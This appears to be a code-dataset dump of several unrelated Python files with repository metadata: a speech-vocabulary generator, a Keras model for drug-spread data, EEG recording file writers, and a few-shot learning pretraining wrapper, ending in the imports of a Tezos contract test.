] | 43 | 2021-06-03T09:07:08.000Z | 2022-03-31T15:21:48.000Z | Audio/OpenTransformer/egs/aishell/local/generate_vocab.py | mls1999725/models | 77b3a9d727cb7cf3a14a75d8fdb0d17bb411bd02 | [
"Apache-2.0"
] | 64 | 2021-05-31T10:34:06.000Z | 2022-01-17T03:44:58.000Z | Audio/OpenTransformer/egs/aishell/local/generate_vocab.py | mls1999725/models | 77b3a9d727cb7cf3a14a75d8fdb0d17bb411bd02 | [
"Apache-2.0"
] | 37 | 2021-07-04T03:13:18.000Z | 2022-03-25T07:30:47.000Z | import os
import sys
from collections import Counter


def count_labels(lines):
    """Count label occurrences across a Kaldi-style transcript.

    Each line is '<utterance-id> <label> <label> ...'; the leading id is
    skipped. Returns a Counter mapping label -> frequency. (The original
    hand-rolled dict counting, and its unused `idx` variable, are replaced
    by collections.Counter; first-seen insertion order is preserved.)
    """
    counts = Counter()
    for line in lines:
        counts.update(line.strip().split()[1:])
    return counts


def write_vocab(vocab_path, counts):
    """Write the vocab file: 3 special tokens, then labels by descending count.

    Output format is one '<label> <index>' per line, indices starting at 3
    after <PAD>/<S/E>/<UNK>. Ties keep first-seen order (sorted() is stable),
    matching the original implementation exactly.
    """
    ordered = sorted(counts.items(), key=lambda item: item[1], reverse=True)
    with open(vocab_path, "w") as w:
        w.write("<PAD> 0\n")
        w.write("<S/E> 1\n")
        w.write("<UNK> 2\n")
        for index, (label, _count) in enumerate(ordered, start=3):
            w.write(label + " " + str(index) + "\n")


if __name__ == "__main__":
    # Usage: python generate_vocab.py <text_in> <vocab_out>
    # Guarded so importing this module no longer touches sys.argv or the
    # filesystem; CLI behavior is unchanged.
    text_in = sys.argv[1]
    vocab_out = sys.argv[2]
    with open(text_in, "r", encoding="utf-8") as f:
        lexicon = count_labels(f)
    print("There are %d label in lexicon!" % len(lexicon))
    write_vocab(vocab_out, lexicon)
    print("Done!")
| 20.657143 | 65 | 0.514523 | import os
import sys
text_in = sys.argv[1]
vocab_out = sys.argv[2]
lexicon = {}
with open(text_in, "r", encoding="utf-8") as f:
for line in f:
parts = line.strip().split()
idx = parts[0]
phones = parts[1:]
for p in phones:
if p not in lexicon:
lexicon[p] = 1
else:
lexicon[p] += 1
print("There are %d label in lexicon!" % len(lexicon))
vocab = sorted(lexicon.items(), key=lambda x: x[1], reverse=True)
index = 3
with open(vocab_out, "w") as w:
w.write("<PAD> 0\n")
w.write("<S/E> 1\n")
w.write("<UNK> 2\n")
for (l, n) in vocab:
w.write(l + " " + str(index) + "\n")
index += 1
print("Done!")
| true | true |
1c3caa05b79ab822072c9a3ba8a1575fcab9bfd3 | 2,212 | py | Python | solution/model2.py | LoveThinkinghard/MCM-2019-Problem-C-drug-spread-maps | 2fe2a6eaaa6c5fdbeab972ffd82a71b60259737e | [
"MIT"
] | 14 | 2019-03-16T02:18:13.000Z | 2022-01-28T14:31:11.000Z | solution/model2.py | LoveThinkinghard/MCM-2019-Problem-C-Solution | 2fe2a6eaaa6c5fdbeab972ffd82a71b60259737e | [
"MIT"
] | 1 | 2019-01-28T14:48:19.000Z | 2019-01-28T14:48:19.000Z | solution/model2.py | LoveThinkinghard/MCM-2019-Problem-C-drug-spread-maps | 2fe2a6eaaa6c5fdbeab972ffd82a71b60259737e | [
"MIT"
] | 2 | 2019-12-20T12:38:44.000Z | 2020-01-16T08:18:54.000Z | # -*- coding: utf-8 -*-
# if you run 'model1.py' just now, you need to restart your kernel.
# or you might have some trouble when you fit the model
import keras.layers as kl
from keras import Model
import numpy as np
import matplotlib.pyplot as plt
#%%
dis_mat = np.load('./data/distance_matrix.npy')
drug_use = np.load('./data/drug_use.npy')
all_s_use = np.load('./data/all_s_use.npy')
# this eco_data comes from socio-economic data, which is difficult to pre-process
# and actually, we made some mistakes on this thing
# which means that the data below is wrong, but can be used
# if you want to, you can try it yourself
x_eco_data = np.load('./data/eco_data.npy')
#%%
X = []
Y = []
for i in range(7):
for n in range(28):
if all_s_use[n, i].sum()>0:
X.append(list([np.matmul(all_s_use[n, i], dis_mat)])+list(x_eco_data[i]))
Y.append(all_s_use[n, i+1])
X3 = []
for i in range(462):
X3.append([X[n][i] for n in range(123)])
#%%
counties_input = kl.Input(shape=(461,))
eco_inputs = []
eco_mat = []
shared_dense = kl.Dense(1)
for i in range(461):
eco_inputs.append(kl.Input(shape=(197,)))
eco_mat.append(shared_dense(eco_inputs[-1]))
eco_mat = kl.concatenate(eco_mat)
hide_input = kl.multiply([counties_input, eco_mat])
output = kl.Dense(461)(hide_input)
model = Model([counties_input]+eco_inputs, output)
model.compile(optimizer='adam', loss='mean_squared_error')
model.summary()
#%%
# it takes several minutes, and you will not go faster even you use 1080ti, I tried
# it might because we use a shared Dense layer for 461 inputs
history = model.fit(x=X3, y=[Y], batch_size=4, epochs=200)
#%%
plt.plot(history.epoch, history.history['loss'])
#%%
eco_weight = model.get_weights()[0]
plt.plot(range(eco_weight.size), eco_weight)
#%%
# head are tags of socio-economic data in a certain order
# this just where we do wrong, because different tags are used in each file.
head = np.load('./data/head.npy')
order = eco_weight.argsort(axis=0)
one_node = model.get_weights()[1]
print(head[order])
print('this list is in a increase order')
if one_node>0:
print('larger the parameter, more the drug use')
else:
print('larger the parameter, less the drug use')
| 32.529412 | 85 | 0.701175 |
import keras.layers as kl
from keras import Model
import numpy as np
import matplotlib.pyplot as plt
dis_mat = np.load('./data/distance_matrix.npy')
drug_use = np.load('./data/drug_use.npy')
all_s_use = np.load('./data/all_s_use.npy')
x_eco_data = np.load('./data/eco_data.npy')
X = []
Y = []
for i in range(7):
for n in range(28):
if all_s_use[n, i].sum()>0:
X.append(list([np.matmul(all_s_use[n, i], dis_mat)])+list(x_eco_data[i]))
Y.append(all_s_use[n, i+1])
X3 = []
for i in range(462):
X3.append([X[n][i] for n in range(123)])
counties_input = kl.Input(shape=(461,))
eco_inputs = []
eco_mat = []
shared_dense = kl.Dense(1)
for i in range(461):
eco_inputs.append(kl.Input(shape=(197,)))
eco_mat.append(shared_dense(eco_inputs[-1]))
eco_mat = kl.concatenate(eco_mat)
hide_input = kl.multiply([counties_input, eco_mat])
output = kl.Dense(461)(hide_input)
model = Model([counties_input]+eco_inputs, output)
model.compile(optimizer='adam', loss='mean_squared_error')
model.summary()
history = model.fit(x=X3, y=[Y], batch_size=4, epochs=200)
plt.plot(history.epoch, history.history['loss'])
eco_weight = model.get_weights()[0]
plt.plot(range(eco_weight.size), eco_weight)
head = np.load('./data/head.npy')
order = eco_weight.argsort(axis=0)
one_node = model.get_weights()[1]
print(head[order])
print('this list is in a increase order')
if one_node>0:
print('larger the parameter, more the drug use')
else:
print('larger the parameter, less the drug use')
| true | true |
1c3caa2c1dee461acb382207574a2741ec964c98 | 1,249 | py | Python | epibox/common/write_file.py | PIA-Group/epibox | 9b12ae27e73c69845d2418b2a2ba00c10e2c99f5 | [
"MIT"
] | null | null | null | epibox/common/write_file.py | PIA-Group/epibox | 9b12ae27e73c69845d2418b2a2ba00c10e2c99f5 | [
"MIT"
] | null | null | null | epibox/common/write_file.py | PIA-Group/epibox | 9b12ae27e73c69845d2418b2a2ba00c10e2c99f5 | [
"MIT"
] | null | null | null | # built-in
from datetime import datetime
import os
# third-party
import numpy as np
def write_file(t, a_file, sync_param, time, fmt):
    """Write the acquired sample block ``t`` to the open file ``a_file``.

    ``sync_param`` and ``time`` are accepted for interface compatibility but
    are not used here; the actual write is delegated to ``write_acq_file``.
    """
    write_acq_file(a_file, t, time, fmt)


def write_acq_file(a_file, t, time, fmt):
    """Append ``t`` to ``a_file`` as space-separated rows, one sample per line.

    ``time`` is currently unused. ``fmt`` is a numpy-style format spec
    (e.g. '%d').
    """
    np.savetxt(
        a_file,
        t,
        fmt=fmt,
        delimiter=' ',
        newline='\n',
        header='',
        footer='',
        comments='',
    )
def write_drift_log(filename, sync_param):
    """Append one drift-log entry to the open file-like ``filename``.

    On the first call (``sync_param['mode']`` falsy) the sync timestamp is
    written and ``mode`` is flipped to 1; on later calls only a newline is
    written and the timestamp is echoed to stdout instead.
    NOTE(review): ``sync_param`` is mutated in place, so the one-time write
    is tracked across calls via the caller's dict -- confirm this is intended.
    """
    sync_time = sync_param['sync_time']
    if not sync_param['mode']:
        filename.write('%s' % sync_time + '\n')
        sync_param['mode'] = 1
    else:
        filename.write('\n')
    # '%s' % ' ' is just a leading space before the timestamp.
    print('%s' % ' ' + sync_time)
def write_annot_file(recording_name, annot):
    """Append one annotation entry next to the recording file.

    Writes '<recording filename> <annot[0]> <annot[1]> <now>' to
    'annotations.txt' in the recording's directory, creating it if needed.
    """
    folder, fname = os.path.split(recording_name)
    annot_path = os.path.join(folder, 'annotations' + '.txt')
    with open(annot_path, 'a+') as annot_file:
        annot_file.write(f'{fname} {annot[0]} {annot[1]} {datetime.now()}\n')
def write_summary_file(recording_name):
    """Append '<filename> <elapsed H:MM:SS>' to summary.txt beside the recording.

    The recording filename must embed its start time as
    'X%Y-%m-%d %H-%M-%S.ext' (first character skipped, last four stripped),
    e.g. 'A2020-01-01 00-00-00.txt'. Elapsed time is measured to now, with
    microseconds dropped from the written value.
    """
    folder, fname = os.path.split(recording_name)
    start_time = datetime.strptime(fname[1:-4], '%Y-%m-%d %H-%M-%S')
    duration = datetime.now() - start_time
    print(f'duration: {str(duration)}')
    with open(os.path.join(folder, 'summary' + '.txt'), 'a+') as summary_file:
        summary_file.write('{} {}\n'.format(fname, str(duration).split('.')[0]))
from datetime import datetime
import os
import numpy as np
def write_file(t, a_file, sync_param, time, fmt):
write_acq_file(a_file, t, time, fmt)
def write_acq_file(a_file, t, time, fmt):
np.savetxt(a_file, t, fmt=fmt, delimiter=' ', newline='\n', header='', footer='', comments ='')
def write_drift_log(filename, sync_param):
sync_time = sync_param['sync_time']
if not sync_param['mode']:
filename.write('%s' % sync_time + '\n')
sync_param['mode'] = 1
else:
filename.write('\n')
print('%s' % ' ' + sync_time)
def write_annot_file(recording_name, annot):
with open(os.path.join(os.path.split(recording_name)[0], 'annotations' + '.txt'), 'a+') as file:
file.write(f'{os.path.split(recording_name)[1]} {annot[0]} {annot[1]} {datetime.now()}\n')
def write_summary_file(recording_name):
duration = datetime.now() - datetime.strptime(os.path.split(recording_name)[1][1:-4], '%Y-%m-%d %H-%M-%S')
print(f'duration: {str(duration)}')
with open(os.path.join(os.path.split(recording_name)[0], 'summary' + '.txt'), 'a+') as file:
file.write('{} {}\n'.format(os.path.split(recording_name)[1], str(duration).split('.')[0])) | true | true |
1c3caab177ba19266092b993ec7f6d18af0990f9 | 10,534 | py | Python | src/models/pretraining.py | shahid313/embedding-propagation | f3da33939ddd3eba195c9c8e0f433944a8b02ef6 | [
"Apache-2.0"
] | null | null | null | src/models/pretraining.py | shahid313/embedding-propagation | f3da33939ddd3eba195c9c8e0f433944a8b02ef6 | [
"Apache-2.0"
] | null | null | null | src/models/pretraining.py | shahid313/embedding-propagation | f3da33939ddd3eba195c9c8e0f433944a8b02ef6 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import os
import torch
import torch.nn.functional as F
from src.tools.meters import BasicMeter
from src.modules.embedding_propagation import EmbeddingPropagation, LabelPropagation
from .base_wrapper import BaseWrapper
from src.modules.distances import prototype_distance
class PretrainWrapper(BaseWrapper):
    """Trains a model using an episodic scheme on multiple GPUs"""
    def __init__(self, model, nclasses, exp_dict):
        """ Constructor
        Args:
            model: architecture to train
            nclasses: number of output classes
            exp_dict: reference to dictionary with the hyperparameters
        """
        super().__init__()
        self.model = model
        self.exp_dict = exp_dict
        self.ngpu = self.exp_dict["ngpu"]
        self.embedding_propagation = EmbeddingPropagation()
        self.label_propagation = LabelPropagation()
        self.model.add_classifier(nclasses, modalities=0)
        self.nclasses = nclasses
        # Optional 4-way rotation-prediction head for self-supervision.
        if self.exp_dict["rotation_weight"] > 0:
            self.model.add_classifier(4, "classifier_rot")
        # Add optimizers here
        self.optimizer = torch.optim.SGD(self.model.parameters(),
                                         lr=self.exp_dict["lr"],
                                         momentum=0.9,
                                         weight_decay=self.exp_dict["weight_decay"],
                                         nesterov=True)
        # Plateau scheduler direction depends on whether the target metric is
        # a loss (minimize) or an accuracy (maximize).
        self.scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizer,
                                                                    mode="min" if "loss" in self.exp_dict["target_loss"] else "max",
                                                                    patience=self.exp_dict["patience"])
        self.model.cuda()
        if self.ngpu > 1:
            self.parallel_model = torch.nn.DataParallel(self.model, device_ids=list(range(self.ngpu)))
    def get_logits(self, embeddings, support_size, query_size, nclasses):
        """Computes the logits from the queries of an episode
        Args:
            embeddings (torch.Tensor): episode embeddings
            support_size (int): size of the support set
            query_size (int): size of the query set
            nclasses (int): number of classes
        Returns:
            torch.Tensor: logits
        """
        b, c = embeddings.size()
        if self.exp_dict["embedding_prop"] == True:
            embeddings = self.embedding_propagation(embeddings)
        if self.exp_dict["distance_type"] == "labelprop":
            # Rows are ordered support-first; queries get the extra "unknown"
            # label nclasses for propagation.
            support_labels = torch.arange(nclasses, device=embeddings.device).view(1, nclasses).repeat(support_size, 1).view(support_size, nclasses)
            unlabeled_labels = nclasses * torch.ones(query_size * nclasses, dtype=support_labels.dtype, device=support_labels.device).view(query_size, nclasses)
            labels = torch.cat([support_labels, unlabeled_labels], 0).view(-1)
            logits = self.label_propagation(embeddings, labels, nclasses)
            logits = logits.view(-1, nclasses, nclasses)[support_size:(support_size + query_size), ...].view(-1, nclasses)
        elif self.exp_dict["distance_type"] == "prototypical":
            # BUGFIX: support_labels was previously only defined in the
            # "labelprop" branch, so this branch raised a NameError at runtime.
            # Build the per-row class labels for the support set here.
            support_labels = torch.arange(nclasses, device=embeddings.device).view(1, nclasses).repeat(support_size, 1)
            embeddings = embeddings.view(-1, nclasses, c)
            support_embeddings = embeddings[:support_size]
            query_embeddings = embeddings[support_size:]
            logits = prototype_distance(support_embeddings.view(-1, c),
                                        query_embeddings.view(-1, c),
                                        support_labels.view(-1))
        return logits
    def train_on_batch(self, batch):
        """Computes the loss of a batch
        Args:
            batch (tuple): Inputs (k, n, c, h, w), labels, and rotation labels
        Returns:
            loss: Loss on the batch
        """
        x, y, r = batch
        y = y.cuda(non_blocking=True).view(-1)
        r = r.cuda(non_blocking=True).view(-1)
        k, n, c, h, w = x.size()
        x = x.view(n*k, c, h, w).cuda(non_blocking=True)
        if self.ngpu > 1:
            embeddings = self.parallel_model(x, is_support=True)
        else:
            embeddings = self.model(x, is_support=True)
        b, c = embeddings.size()
        loss = 0
        # Optional rotation-prediction auxiliary loss.
        if self.exp_dict["rotation_weight"] > 0:
            rot = self.model.classifier_rot(embeddings)
            loss += F.cross_entropy(rot, r) * self.exp_dict["rotation_weight"]
        if self.exp_dict["embedding_prop"] == True:
            embeddings = self.embedding_propagation(embeddings)
        logits = self.model.classifier(embeddings)
        loss += F.cross_entropy(logits, y) * self.exp_dict["cross_entropy_weight"]
        return loss
    def val_on_batch(self, batch):
        """Computes the loss and accuracy on a validation batch
        Args:
            batch (dict): Episode dict
        Returns:
            tuple: loss and accuracy of the episode
        """
        nclasses = batch["nclasses"]
        query_size = batch["query_size"]
        logits = self.predict_on_batch(batch)
        # Query rows repeat the class pattern 0..nclasses-1, query_size times.
        query_labels = torch.arange(nclasses, device=logits.device).view(1, nclasses).repeat(query_size, 1).view(-1)
        loss = F.cross_entropy(logits, query_labels)
        accuracy = float(logits.max(-1)[1].eq(query_labels).float().mean())
        return loss, accuracy
    def predict_on_batch(self, batch):
        """Computes the logits of an episode
        Args:
            batch (dict): episode dict
        Returns:
            tensor: logits for the queries of the current episode
        """
        nclasses = batch["nclasses"]
        support_size = batch["support_size"]
        query_size = batch["query_size"]
        c = batch["channels"]
        h = batch["height"]
        w = batch["width"]
        # Stack support rows above query rows before embedding.
        tx = batch["support_set"].view(support_size, nclasses, c, h, w).cuda(non_blocking=True)
        vx = batch["query_set"].view(query_size, nclasses, c, h, w).cuda(non_blocking=True)
        x = torch.cat([tx, vx], 0)
        x = x.view(-1, c, h, w).cuda(non_blocking=True)
        if self.ngpu > 1:
            embeddings = self.parallel_model(x, is_support=True)
        else:
            embeddings = self.model(x, is_support=True)
        return self.get_logits(embeddings, support_size, query_size, nclasses)
    def train_on_loader(self, data_loader, max_iter=None, debug_plot_path=None):
        """Iterate over the training set
        Args:
            data_loader (torch.utils.data.DataLoader): a pytorch dataloader
            max_iter (int, optional): Max number of iterations if the end of the dataset is not reached. Defaults to None.
        Returns:
            metrics: dictionary with metrics of the training set
        """
        self.model.train()
        train_loss_meter = BasicMeter.get("train_loss").reset()
        # Iterate through tasks, each iteration loads n tasks, with n = number of GPU
        for batch_idx, batch in enumerate(data_loader):
            self.optimizer.zero_grad()
            loss = self.train_on_batch(batch)
            train_loss_meter.update(float(loss), 1)
            loss.backward()
            self.optimizer.step()
            if batch_idx + 1 == max_iter:
                break
        return {"train_loss": train_loss_meter.mean()}
    @torch.no_grad()
    def val_on_loader(self, data_loader, max_iter=None):
        """Iterate over the validation set
        Args:
            data_loader: iterable validation data loader
            max_iter: max number of iterations to perform if the end of the dataset is not reached
        """
        self.model.eval()
        val_loss_meter = BasicMeter.get("val_loss").reset()
        val_accuracy_meter = BasicMeter.get("val_accuracy").reset()
        # Iterate through tasks, each iteration loads n tasks, with n = number of GPU
        for batch_idx, _data in enumerate(data_loader):
            batch = _data[0]
            loss, accuracy = self.val_on_batch(batch)
            val_loss_meter.update(float(loss), 1)
            val_accuracy_meter.update(float(accuracy), 1)
        loss = BasicMeter.get(self.exp_dict["target_loss"], recursive=True, force=False).mean()
        self.scheduler.step(loss)  # update the learning rate monitor
        return {"val_loss": val_loss_meter.mean(), "val_accuracy": val_accuracy_meter.mean()}
    @torch.no_grad()
    def test_on_loader(self, data_loader, max_iter=None):
        """Iterate over the test set
        Args:
            data_loader: iterable test data loader
            max_iter: max number of iterations to perform if the end of the dataset is not reached
        """
        self.model.eval()
        test_loss_meter = BasicMeter.get("test_loss").reset()
        test_accuracy_meter = BasicMeter.get("test_accuracy").reset()
        # Iterate through tasks, each iteration loads n tasks, with n = number of GPU
        for batch_idx, _data in enumerate(data_loader):
            batch = _data[0]
            loss, accuracy = self.val_on_batch(batch)
            test_loss_meter.update(float(loss), 1)
            test_accuracy_meter.update(float(accuracy), 1)
        return {"test_loss": test_loss_meter.mean(), "test_accuracy": test_accuracy_meter.mean()}
    def get_state_dict(self):
        """Obtains the state dict of this model including optimizer, scheduler, etc
        Returns:
            dict: state dict
        """
        ret = {}
        ret["optimizer"] = self.optimizer.state_dict()
        ret["model"] = self.model.state_dict()
        ret["scheduler"] = self.scheduler.state_dict()
        return ret
    def load_state_dict(self, state_dict):
        """Loads the state of the model
        Args:
            state_dict (dict): The state to load
        """
        self.optimizer.load_state_dict(state_dict["optimizer"])
        self.model.load_state_dict(state_dict["model"])
        self.scheduler.load_state_dict(state_dict["scheduler"])
    def get_lr(self):
        """Returns the current learning rate of each optimizer param group."""
        ret = {}
        for i, param_group in enumerate(self.optimizer.param_groups):
            ret["current_lr_%d" % i] = float(param_group["lr"])
        return ret
    def is_end_of_training(self):
        """True once the scheduler has decayed the LR below the stop threshold."""
        lr = self.get_lr()["current_lr_0"]
        return lr <= (self.exp_dict["lr"] * self.exp_dict["min_lr_decay"])
import os
import torch
import torch.nn.functional as F
from src.tools.meters import BasicMeter
from src.modules.embedding_propagation import EmbeddingPropagation, LabelPropagation
from .base_wrapper import BaseWrapper
from src.modules.distances import prototype_distance
class PretrainWrapper(BaseWrapper):
def __init__(self, model, nclasses, exp_dict):
super().__init__()
self.model = model
self.exp_dict = exp_dict
self.ngpu = self.exp_dict["ngpu"]
self.embedding_propagation = EmbeddingPropagation()
self.label_propagation = LabelPropagation()
self.model.add_classifier(nclasses, modalities=0)
self.nclasses = nclasses
if self.exp_dict["rotation_weight"] > 0:
self.model.add_classifier(4, "classifier_rot")
self.optimizer = torch.optim.SGD(self.model.parameters(),
lr=self.exp_dict["lr"],
momentum=0.9,
weight_decay=self.exp_dict["weight_decay"],
nesterov=True)
self.scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizer,
mode="min" if "loss" in self.exp_dict["target_loss"] else "max",
patience=self.exp_dict["patience"])
self.model.cuda()
if self.ngpu > 1:
self.parallel_model = torch.nn.DataParallel(self.model, device_ids=list(range(self.ngpu)))
def get_logits(self, embeddings, support_size, query_size, nclasses):
b, c = embeddings.size()
if self.exp_dict["embedding_prop"] == True:
embeddings = self.embedding_propagation(embeddings)
if self.exp_dict["distance_type"] == "labelprop":
support_labels = torch.arange(nclasses, device=embeddings.device).view(1, nclasses).repeat(support_size, 1).view(support_size, nclasses)
unlabeled_labels = nclasses * torch.ones(query_size * nclasses, dtype=support_labels.dtype, device=support_labels.device).view(query_size, nclasses)
labels = torch.cat([support_labels, unlabeled_labels], 0).view(-1)
logits = self.label_propagation(embeddings, labels, nclasses)
logits = logits.view(-1, nclasses, nclasses)[support_size:(support_size + query_size), ...].view(-1, nclasses)
elif self.exp_dict["distance_type"] == "prototypical":
embeddings = embeddings.view(-1, nclasses, c)
support_embeddings = embeddings[:support_size]
query_embeddings = embeddings[support_size:]
logits = prototype_distance(support_embeddings.view(-1, c),
query_embeddings.view(-1, c),
support_labels.view(-1))
return logits
def train_on_batch(self, batch):
x, y, r = batch
y = y.cuda(non_blocking=True).view(-1)
r = r.cuda(non_blocking=True).view(-1)
k, n, c, h, w = x.size()
x = x.view(n*k, c, h, w).cuda(non_blocking=True)
if self.ngpu > 1:
embeddings = self.parallel_model(x, is_support=True)
else:
embeddings = self.model(x, is_support=True)
b, c = embeddings.size()
loss = 0
if self.exp_dict["rotation_weight"] > 0:
rot = self.model.classifier_rot(embeddings)
loss += F.cross_entropy(rot, r) * self.exp_dict["rotation_weight"]
if self.exp_dict["embedding_prop"] == True:
embeddings = self.embedding_propagation(embeddings)
logits = self.model.classifier(embeddings)
loss += F.cross_entropy(logits, y) * self.exp_dict["cross_entropy_weight"]
return loss
def val_on_batch(self, batch):
nclasses = batch["nclasses"]
query_size = batch["query_size"]
logits = self.predict_on_batch(batch)
query_labels = torch.arange(nclasses, device=logits.device).view(1, nclasses).repeat(query_size, 1).view(-1)
loss = F.cross_entropy(logits, query_labels)
accuracy = float(logits.max(-1)[1].eq(query_labels).float().mean())
return loss, accuracy
def predict_on_batch(self, batch):
nclasses = batch["nclasses"]
support_size = batch["support_size"]
query_size = batch["query_size"]
k = (support_size + query_size)
c = batch["channels"]
h = batch["height"]
w = batch["width"]
tx = batch["support_set"].view(support_size, nclasses, c, h, w).cuda(non_blocking=True)
vx = batch["query_set"].view(query_size, nclasses, c, h, w).cuda(non_blocking=True)
x = torch.cat([tx, vx], 0)
x = x.view(-1, c, h, w).cuda(non_blocking=True)
if self.ngpu > 1:
embeddings = self.parallel_model(x, is_support=True)
else:
embeddings = self.model(x, is_support=True)
b, c = embeddings.size()
return self.get_logits(embeddings, support_size, query_size, nclasses)
def train_on_loader(self, data_loader, max_iter=None, debug_plot_path=None):
self.model.train()
train_loss_meter = BasicMeter.get("train_loss").reset()
for batch_idx, batch in enumerate(data_loader):
self.optimizer.zero_grad()
loss = self.train_on_batch(batch)
train_loss_meter.update(float(loss), 1)
loss.backward()
self.optimizer.step()
if batch_idx + 1 == max_iter:
break
return {"train_loss": train_loss_meter.mean()}
@torch.no_grad()
def val_on_loader(self, data_loader, max_iter=None):
self.model.eval()
val_loss_meter = BasicMeter.get("val_loss").reset()
val_accuracy_meter = BasicMeter.get("val_accuracy").reset()
for batch_idx, _data in enumerate(data_loader):
batch = _data[0]
loss, accuracy = self.val_on_batch(batch)
val_loss_meter.update(float(loss), 1)
val_accuracy_meter.update(float(accuracy), 1)
loss = BasicMeter.get(self.exp_dict["target_loss"], recursive=True, force=False).mean()
self.scheduler.step(loss)
return {"val_loss": val_loss_meter.mean(), "val_accuracy": val_accuracy_meter.mean()}
@torch.no_grad()
def test_on_loader(self, data_loader, max_iter=None):
self.model.eval()
test_loss_meter = BasicMeter.get("test_loss").reset()
test_accuracy_meter = BasicMeter.get("test_accuracy").reset()
for batch_idx, _data in enumerate(data_loader):
batch = _data[0]
loss, accuracy = self.val_on_batch(batch)
test_loss_meter.update(float(loss), 1)
test_accuracy_meter.update(float(accuracy), 1)
return {"test_loss": test_loss_meter.mean(), "test_accuracy": test_accuracy_meter.mean()}
def get_state_dict(self):
ret = {}
ret["optimizer"] = self.optimizer.state_dict()
ret["model"] = self.model.state_dict()
ret["scheduler"] = self.scheduler.state_dict()
return ret
def load_state_dict(self, state_dict):
self.optimizer.load_state_dict(state_dict["optimizer"])
self.model.load_state_dict(state_dict["model"])
self.scheduler.load_state_dict(state_dict["scheduler"])
def get_lr(self):
ret = {}
for i, param_group in enumerate(self.optimizer.param_groups):
ret["current_lr_%d" % i] = float(param_group["lr"])
return ret
def is_end_of_training(self):
lr = self.get_lr()["current_lr_0"]
return lr <= (self.exp_dict["lr"] * self.exp_dict["min_lr_decay"]) | true | true |
1c3cad6489686e71d6b612bcf98fda2ef987c325 | 685 | py | Python | setup.py | kcphysics/ATSAPI | 4a14133d9143d5cb1ecfc434dc49e37a72f94db4 | [
"MIT"
] | null | null | null | setup.py | kcphysics/ATSAPI | 4a14133d9143d5cb1ecfc434dc49e37a72f94db4 | [
"MIT"
] | 4 | 2020-08-30T03:52:50.000Z | 2020-09-03T02:51:01.000Z | setup.py | kcphysics/ATSAPI | 4a14133d9143d5cb1ecfc434dc49e37a72f94db4 | [
"MIT"
from setuptools import setup, find_packages

# Package metadata for the ATS HTTP API.
setup(
    name="atsapi",
    # Fixed typo: "utilites" -> "utilities".
    description="An API to make some game utilities for TrekMUSH: Among The Stars available via HTTP",
    url="https://github.com/kcphysics/ATSAPI",
    author="KCPhysics",
    packages=find_packages(),
    classifiers=[
        # Fixed typo ("Programmin") and replaced invalid strings with valid
        # PyPI trove classifiers (patch versions and bare "License :: MIT"
        # are not recognized classifiers).
        "Programming Language :: Python :: 3.6",
        "Natural Language :: English",
        "License :: OSI Approved :: MIT License"
    ],
    entry_points={
        # No console scripts are exposed yet.
        "console_scripts": [
        ]
    },
    zip_safe=False,
    install_requires=[
        "aiohttp",
        "aiohttp-swagger",
        "aiohttp-tokenauth",
        "aiohttp-jinja2",
        "importlib_resources",
        "aioredis"
    ]
)
| 24.464286 | 101 | 0.586861 | from setuptools import setup, find_packages
setup(
name="atsapi",
description="An API to make some game utilites for TrekMUSH: Among The Stars available via HTTP",
url="https://github.com/kcphysics/ATSAPI",
author="KCPhysics",
packages=find_packages(),
classifiers=[
"Programmin Language :: Python :: 3.6.8",
"Natural Language :: English",
"License :: MIT"
],
entry_points={
"console_scripts": [
]
},
zip_safe=False,
install_requires=[
"aiohttp",
"aiohttp-swagger",
"aiohttp-tokenauth",
"aiohttp-jinja2",
"importlib_resources",
"aioredis"
]
)
| true | true |
1c3cad9d933bf2cb75ef6f8e0df67f4f37153be8 | 471 | py | Python | abc064/abc064_d.py | Vermee81/practice-coding-contests | 78aada60fa75f208ee0eef337b33b27b1c260d18 | [
"MIT"
] | null | null | null | abc064/abc064_d.py | Vermee81/practice-coding-contests | 78aada60fa75f208ee0eef337b33b27b1c260d18 | [
"MIT"
] | null | null | null | abc064/abc064_d.py | Vermee81/practice-coding-contests | 78aada60fa75f208ee0eef337b33b27b1c260d18 | [
"MIT"
] | null | null | null | # https://atcoder.jp/contests/abc064/tasks/abc064_d
from collections import deque
# AtCoder ABC064 D: insert the minimum number of brackets to make S valid.
# Greedy: prepend '(' whenever a prefix goes negative, append ')' at the end
# for any brackets still open.
N = int(input())  # length of the bracket string
S = [s for s in input()]  # the string, split into single characters
deqS = deque(S)  # working copy; deque allows O(1) prepends
left = 0   # '(' seen so far, including any prepended ones
right = 0  # ')' seen so far
for i, s in enumerate(S):
    if s == '(':
        left += 1
    else:
        right += 1
        # Prefix has more ')' than '(': prepend one '(' to rebalance.
        if right > left:
            deqS.appendleft('(')
            left += 1
            continue
    # After the last input character, close any still-open brackets.
    # (The appended element is a multi-char string; join handles it fine.)
    if i == N - 1 and left > right:
        addStr = ')' * (left - right)
        deqS.append(addStr)
newS = "".join(deqS)
print(newS)
| 19.625 | 51 | 0.535032 |
from collections import deque
N = int(input())
S = [s for s in input()]
deqS = deque(S)
left = 0
right = 0
for i, s in enumerate(S):
if s == '(':
left += 1
else:
right += 1
if right > left:
deqS.appendleft('(')
left += 1
continue
if i == N - 1 and left > right:
addStr = ')' * (left - right)
deqS.append(addStr)
newS = "".join(deqS)
print(newS)
| true | true |
1c3cadc1558b288943a4faced43eca5c4e162225 | 1,888 | py | Python | tests/contract_tests/KT1GbWiFga8U9ikdxNMeXWoTrx65sCg9MNaU/test_gbwifg_setWhiteListing.py | konchunas/pytezos | 65576d18bdf1956fae8ea21241b6c43a38921b83 | [
"MIT"
] | 98 | 2019-02-07T16:33:38.000Z | 2022-03-31T15:53:41.000Z | tests/contract_tests/KT1GbWiFga8U9ikdxNMeXWoTrx65sCg9MNaU/test_gbwifg_setWhiteListing.py | konchunas/pytezos | 65576d18bdf1956fae8ea21241b6c43a38921b83 | [
"MIT"
] | 152 | 2019-05-20T16:38:56.000Z | 2022-03-30T14:24:38.000Z | tests/contract_tests/KT1GbWiFga8U9ikdxNMeXWoTrx65sCg9MNaU/test_gbwifg_setWhiteListing.py | konchunas/pytezos | 65576d18bdf1956fae8ea21241b6c43a38921b83 | [
"MIT"
] | 34 | 2019-07-25T12:03:51.000Z | 2021-11-11T22:23:38.000Z | from unittest import TestCase
from os.path import dirname, join
import json
from pytezos.michelson.program import MichelsonProgram
from pytezos.michelson.types.big_map import big_map_diff_to_lazy_diff
from pytezos.michelson.forge import forge_micheline, unforge_micheline
